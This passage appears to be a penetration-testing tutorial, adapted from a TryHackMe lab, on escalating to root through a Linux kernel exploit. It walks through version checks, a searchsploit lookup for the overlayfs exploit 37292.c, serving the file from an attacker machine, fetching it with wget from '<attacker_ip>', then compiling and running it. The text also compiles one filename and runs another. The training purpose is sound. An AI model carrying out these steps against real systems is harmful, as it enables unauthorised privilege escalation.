Kernel exploit

The kernel on Linux systems manages the communication between components such as the memory on the system and applications. This critical function requires the kernel to have specific privileges; thus, a successful exploit will potentially lead to root privileges.

Example

Given that a remote shell is gained on a Linux Ubuntu machine with a low-privileged user. A few important information can be gathered from the enumeration commands discussed in the previous section under Enumeration.

1. Gather information on the kernel version

$ cat /proc/version
Linux version 3.13.0-24-generic ...

# OR

$ uname -a
Linux ... 3.13.0-24-generic ...

1. Search for vulnerabilities

From the attacker machine

$ searchsploit linux kernel 3.13

...
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'ove | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'ove | linux/local/37293.txt
...

Or directly from Exploit-DB:

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege EscalationExploit Database

Look for the exploit code and run a Python web server to serve the content

$ find / -path '*linux/local/37292.c' 2>/dev/null
/usr/share/exploitdb/exploits/linux/local/37292.c

$ cd /usr/share/exploitdb/exploits/linux/local

...linux/local$ python3 -m http.server 8888

1. Navigate to a directory with write and execute permissions for all such as /tmp

From the target machine

$ find / -perm 003 -type d 2>/dev/null
/tmp
...

$ cd /tmp
$ wget http://<attacker_ip>:<port>/37292.c
...

$ gcc 37292.c -o 37292
$ ./37292.out

...

root# whoami
root

root# ...

Adapted from task 5 of the TryHackMe practice room:

Linux Privilege EscalationTryHackMe